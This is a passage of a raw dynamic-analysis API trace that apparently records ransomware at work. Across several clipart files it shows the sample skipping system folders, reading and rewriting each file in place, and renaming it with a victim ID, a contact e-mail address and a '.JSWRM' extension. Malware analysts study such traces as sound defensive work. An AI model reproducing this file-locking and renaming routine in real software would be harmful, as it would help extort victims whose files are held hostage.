cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107712.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0082.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0082.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107712.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107712.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107712.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0082.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0082.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0082.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0082.765] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107712.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107712.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.765] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4636) returned 1 [0082.765] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1210) returned 0x205850 [0082.766] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1210, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1210, lpOverlapped=0x0) returned 1 [0082.767] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.767] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1210, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1210, lpOverlapped=0x0) returned 1 [0082.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0082.767] CloseHandle (hObject=0x314) returned 1 [0082.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0082.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0082.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0082.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0082.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0082.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0082.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0082.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0082.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0082.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0082.768] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107712.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107712.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107712.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107712.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0082.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0082.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0082.769] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe736331, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe736331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe78281d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xed8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107718.WMF", cAlternateFileName="")) returned 1 [0082.769] lstrcmpiW (lpString1="J0107718.WMF", lpString2=".") returned 1 [0082.769] lstrcmpiW (lpString1="J0107718.WMF", lpString2="..") returned 1 [0082.769] lstrcmpiW (lpString1="J0107718.WMF", lpString2="...") returned 1 [0082.769] lstrcmpiW (lpString1="J0107718.WMF", lpString2="windows") returned -1 [0082.769] lstrcmpiW (lpString1="J0107718.WMF", lpString2="recovery") returned -1 [0082.769] lstrcmpiW (lpString1="J0107718.WMF", lpString2="perflogs") returned -1 [0082.769] lstrcmpiW (lpString1="J0107718.WMF", lpString2="documents and settings") returned 1 [0082.769] lstrcmpiW (lpString1="J0107718.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.769] lstrcmpiW (lpString1="J0107718.WMF", lpString2="system volume information") returned -1 [0082.769] lstrcmpiW (lpString1="J0107718.WMF", lpString2="msocache") returned -1 [0082.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0082.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107718.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107718.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107718.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0082.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0082.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107718.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107718.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107718.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0082.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0082.769] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0082.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0082.769] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107718.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107718.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.770] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3800) returned 1 [0082.770] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xed0) returned 0x23fc98 [0082.770] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xed0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xed0, lpOverlapped=0x0) returned 1 [0082.772] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.772] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xed0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xed0, lpOverlapped=0x0) returned 1 [0082.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0082.772] CloseHandle (hObject=0x314) returned 1 [0082.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0082.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0082.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0082.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0082.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0082.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0082.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0082.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0082.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.772] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107718.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107718.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107718.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107718.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0082.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0082.773] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0082.773] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe736331, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe736331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe736331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2044, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107722.WMF", cAlternateFileName="")) returned 1 [0082.773] lstrcmpiW (lpString1="J0107722.WMF", lpString2=".") returned 1 [0082.773] lstrcmpiW (lpString1="J0107722.WMF", lpString2="..") returned 1 [0082.773] lstrcmpiW (lpString1="J0107722.WMF", lpString2="...") returned 1 [0082.773] lstrcmpiW (lpString1="J0107722.WMF", lpString2="windows") returned -1 [0082.773] lstrcmpiW (lpString1="J0107722.WMF", lpString2="recovery") returned -1 [0082.774] lstrcmpiW (lpString1="J0107722.WMF", lpString2="perflogs") returned -1 [0082.774] lstrcmpiW (lpString1="J0107722.WMF", lpString2="documents and settings") returned 1 [0082.774] lstrcmpiW (lpString1="J0107722.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.774] lstrcmpiW (lpString1="J0107722.WMF", lpString2="system volume information") returned -1 [0082.774] lstrcmpiW (lpString1="J0107722.WMF", lpString2="msocache") returned -1 [0082.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0082.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107722.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107722.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107722.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0082.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0082.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107722.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107722.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107722.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0082.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0082.774] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0082.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0082.774] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107722.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107722.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.774] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8260) returned 1 [0082.774] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.774] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2040) returned 0x205850 [0082.775] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x2040, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x2040, lpOverlapped=0x0) returned 1 [0082.776] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.776] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x2040, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x2040, lpOverlapped=0x0) returned 1 [0082.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0082.777] CloseHandle (hObject=0x314) returned 1 [0082.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0082.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0082.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0082.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0082.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0082.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0082.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0082.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0082.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0082.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0082.777] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107722.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107722.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107722.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107722.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0082.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0082.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0082.778] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7a8a31, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7a8a31, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7cecf4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b68, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107724.WMF", cAlternateFileName="")) returned 1 [0082.778] lstrcmpiW (lpString1="J0107724.WMF", lpString2=".") returned 1 [0082.778] lstrcmpiW (lpString1="J0107724.WMF", lpString2="..") returned 1 [0082.778] lstrcmpiW (lpString1="J0107724.WMF", lpString2="...") returned 1 [0082.778] lstrcmpiW (lpString1="J0107724.WMF", lpString2="windows") returned -1 [0082.778] lstrcmpiW (lpString1="J0107724.WMF", lpString2="recovery") returned -1 [0082.778] lstrcmpiW (lpString1="J0107724.WMF", lpString2="perflogs") returned -1 [0082.778] lstrcmpiW (lpString1="J0107724.WMF", lpString2="documents and settings") returned 1 [0082.778] lstrcmpiW (lpString1="J0107724.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.778] lstrcmpiW (lpString1="J0107724.WMF", lpString2="system volume information") returned -1 [0082.778] lstrcmpiW (lpString1="J0107724.WMF", lpString2="msocache") returned -1 [0082.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0082.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107724.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107724.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107724.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0082.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0082.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107724.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107724.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107724.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0082.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0082.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0082.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0082.779] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107724.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107724.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.779] GetFileSizeEx (in: 